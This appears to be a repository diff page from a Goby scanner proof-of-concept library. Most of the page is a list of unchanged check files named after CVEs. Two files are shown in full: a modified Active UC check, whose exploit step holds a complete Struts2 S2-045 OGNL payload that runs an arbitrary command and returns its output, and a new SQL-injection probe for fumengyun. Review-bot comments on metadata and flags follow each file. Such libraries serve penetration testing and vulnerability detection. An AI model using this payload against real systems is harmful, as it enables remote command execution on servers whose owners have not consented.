Showing first 200 files as there are too many
-
lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
1 1 { 2 - "Name": "Active UC index.action RCE", 2 + "Name": "Active UC index.action 远程命令执行漏洞", 3 3 "Level": "3", 4 4 "Tags": [ 5 5 "RCE" 6 6 ], 7 7 "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", 8 - "Description": "", 9 - "Product": "Active UC", 10 - "Homepage": "http://www.iactive.com.cn/", 11 - "Author": "", 12 - "Impact": "Active UC index.action has a RCE vulnerability.", 13 - "Recommendation": "update", 14 - "References": [], 15 - "HasExp": true, 16 - "ExpParams": [ 17 - { 18 - "Name": "cmd", 19 - "Type": "input", 20 - "Value": "whoami" 21 - } 8 + "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", 9 + "Product": "网动统一通信平台(Active UC)", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "luckying", 12 + "Impact": "", 13 + "Recommandation": "", 14 + "References": [ 15 + "https://gobies.org/" 22 16 ], 23 - "ExpTips": { 24 - "Type": "", 25 - "Content": "" 26 - }, 17 + "HasExp": true, 18 + "ExpParams": [ 19 + { 20 + "name": "Cmd", 21 + "type": "input", 22 + "value": "whoami", 23 + "show": "" 24 + } 25 + ], 27 26 "ScanSteps": [ 28 27 "AND", 29 28 { skipped 12 lines 42 41 "Pragma": "no-cache" 43 42 }, 44 43 "data_type": "text", 45 - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" 44 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" 46 45 }, 47 46 "ResponseTest": { 48 47 "type": "group", skipped 11 lines 60 59 "SetVariable": [] 61 60 } 62 61 ], 63 - "ExploitSteps": [ 62 + "ExploitSteps": [ 64 63 "AND", 65 64 { 66 65 "Request": { skipped 6 lines 73 72 "Connection": "close", 74 73 "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", 75 74 "Charsert": "UTF-8", 76 - "Content-Type": "%{(#nike='multipart/form-data').(#[email 
protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", 75 + "Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", 77 76 "Cache-Control": "no-cache", 78 77 "Pragma": "no-cache" 79 78 }, 80 79 "data_type": "text", 81 - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: 
text/plain\r\n-----------------------------18012721719170" 80 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" 82 81 }, 83 82 "ResponseTest": { 84 83 "type": "group", skipped 9 lines 94 93 ] 95 94 }, 96 95 "SetVariable": [ 97 - "output|lastbody|undefined|undefined" 98 - ] 96 + "output|lastbody" 97 + ] 99 98 } 100 99 ], 101 - "PostTime": "0000-00-00 00:00:00", 102 - "GobyVersion": "0.0.0" 100 + "PostTime": "2021-06-28 10:08:54", 101 + "GobyVersion": "1.8.268" 103 102 } -
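Review bot: The new side renames the metadata key to `"Recommandation"` (new line 13), so a consumer that reads `"Recommendation"`, the spelling used by the old side and by the two files added further down this page, finds no remediation field for this check. Restore the spelling and keep the guidance, e.g. `"Recommendation": "update"` as on the old side. The same hunk blanks `"Impact"`, which used to carry a one-line statement, so a finding from this check would be reported with neither impact nor fix. `"References"` now lists only the scanner's homepage; a link to the vendor or the S2-045 advisory named in the new `"Description"` would serve whoever triages the result better. The ScanSteps and ExploitSteps bodies are partly skipped in this view, so the check logic itself is not reviewed here.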
lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Ametys_CMS_infoleak_CVE_2022_26159.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache ActiveMQ Console控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Cocoon Xml 注入 CVE-2020-11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Kylin Console 控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Kylin 未授权配置泄露 CVE-2020-13937.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Solr任意文件读取漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_API_Unauthorized_Access_CVE-2021-45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ActiveMQ_Console_Weak_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ActiveMQ_default_admin_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Cocoon_XML_Injection_CVE_2020_11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_CouchDB_Remote_Privilege_Escalation_CVE-2017-12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_CouchDB_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE-2021-36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Flink_CVE_2020_17519.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_2.4.50_Path_Traversal_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_RCE_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE-2021-40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(1).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(2).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ShenYu_Admin_Unauth_Access_CVE_2022_23944.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_Log4j2CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_RemoteStreaming_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_053_RCE_CVE_2017_12611.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_059_RCE_CVE_2019_0230.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_062_RCE_CVE_2021_31805.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/AspCMS_commentList.asp_SQLinjection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Confluence_OGNL_Injection_RCE_CVE_2022_26134.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_Path_Traversal_CVE_2021_26086.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_Seraph_Authentication_bypass_CVE_2022_0540.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure_CVE_2020_14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/BSPHP_index.php_unauthorized_access_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/BigAnt_Server_v5.6.06_Path_Traversal_CVE_2022_23347.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CVE_2018_19367_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CVE_2022_22947.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Casdoor_1.13.0_SQL_InjectionCVE_2022_24124.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
1 + { 2 + "Name": "fumengyun AjaxMethod.ashx SQL injection", 3 + "Level": "3", 4 + "Tags": [ 5 + "sqli" 6 + ], 7 + "GobyQuery": "title=\"孚盟云\"", 8 + "Description": "", 9 + "Product": "", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "[email protected]", 12 + "Impact": "", 13 + "Recommendation": "", 14 + "References": [ 15 + "https://gobies.org/" 16 + ], 17 + "HasExp": true, 18 + "ExpParams": null, 19 + "ExpTips": { 20 + "Type": "", 21 + "Content": "" 22 + }, 23 + "ScanSteps": [ 24 + "AND", 25 + { 26 + "Request": { 27 + "method": "GET", 28 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27", 29 + "follow_redirect": true, 30 + "header": null, 31 + "data_type": "text", 32 + "data": "", 33 + "set_variable": [] 34 + }, 35 + "ResponseTest": { 36 + "type": "group", 37 + "operation": "AND", 38 + "checks": [ 39 + { 40 + "type": "item", 41 + "variable": "$code", 42 + "operation": "==", 43 + "value": "500", 44 + "bz": "" 45 + }, 46 + { 47 + "type": "item", 48 + "variable": "$body", 49 + "operation": "contains", 50 + "value": "SELECT", 51 + "bz": "" 52 + } 53 + ] 54 + }, 55 + "SetVariable": [ 56 + "output|lastbody|regex|" 57 + ] 58 + } 59 + ], 60 + "ExploitSteps": [ 61 + "AND", 62 + { 63 + "Request": { 64 + "method": "GET", 65 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27", 66 + "follow_redirect": true, 67 + "header": null, 68 + "data_type": "text", 69 + "data": "", 70 + "set_variable": [] 71 + }, 72 + "ResponseTest": { 73 + "type": "group", 74 + "operation": "AND", 75 + "checks": [ 76 + { 77 + "type": "item", 78 + "variable": "$code", 79 + "operation": "==", 80 + "value": "500", 81 + "bz": "" 82 + }, 83 + { 84 + "type": "item", 85 + "variable": "$body", 86 + "operation": "contains", 87 + "value": "SELECT", 88 + "bz": "" 89 + } 90 + ] 91 + }, 92 + "SetVariable": [ 93 + "output|lastbody|regex|" 94 + ] 95 + } 96 + ], 97 + "PostTime": "2022-07-02 21:53:57", 98 + "GobyVersion": "1.9.323" 99 + } -
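Review bot: `"HasExp": true` is set although `ExploitSteps` (new lines 60–96) is a copy of `ScanSteps` and `"ExpParams"` is `null`, so the file advertises an exploit stage that only repeats the detection request; `"HasExp": false` would describe it accurately. `"ExpParams": null` also differs in type from the array used in the Active UC file on this page, so `"ExpParams": []` is the safer value for consumers that iterate it. `"SetVariable": ["output|lastbody|regex|"]` carries an empty regex, which looks like an unfilled template field. `"Description"`, `"Product"`, `"Impact"` and `"Recommendation"` are all empty, so a hit gives the operator nothing to act on. The GoCD file added further down has the same HasExp, empty-regex and empty-metadata issues.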
lib/goby/goby_pocs/Chanjet_CRM_get_usedspace.php_sql_injection_CNVD_2021_12845.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_ExportSettings.sh_Info_Leak_CNVD_2020_67110.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_Login_Bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_routed_the_login_bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Citrix_Unauthorized_CVE_2020_8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Citrix_unauthenticated_LFI_CVE-2020-8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/ClusterEngineV4.0_RCE_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/ClusterEngine_V4.0_Shell_cluster_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Coldfusion_LFI_CVE_2010_2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Confluence_RCE_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Coremail_Config_Disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Coremail_configuration_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CouchCMS_Infoleak_CVE-2018-7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couch_CMS_Infoleak_CVE_2018_7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couchdb_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CraftCMS_SEOmatic_Server-Side_Template_Injection_CVE-2020-9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CraftCMS_Seomatic_RCE_CVE_2020_9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link AC集中管理系统默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link DCS系列监控 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_AC_management_system_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DCS_2530L_Administrator_password_disclosure_CVE_2020_25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DIR-850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DIR_868L_x_DIR_817LW_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_Info_Leak_CVE-2019-17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_AC_Centralized_management_system__Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_DC_Disclosure_of_account_password_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_DIR_868L_getcfg.php_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE-2018-6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE_2018_6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Discuz!ML_3.x_RCE_CNVD-2019-22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Discuz_ML_3.x_RCE__CNVD_2019_22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dlink_850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dlink_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dlink_RCE_CVE_2019_16920.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DocCMS_keyword_SQL_injection_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Eyou_Mail_System_RCE_CNVD_2021_26422.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Eyou_Mail_system_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_RCE_CVE_2021_22986_exp.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_API_auth_bypass_CVE_2022_1388.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_Unauthenticated_RCE_CVE_2021_22986.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_Directory_traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_Arbitrary_file_read_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_Fileread_CNVD_2018_04757.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_v9.0_Directory_Traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Finetree_5MP_Network_Camera_Default_Login_unauthorized_user_add.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Finetree_5MP_default_password_or_Unauthorized_user_added.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
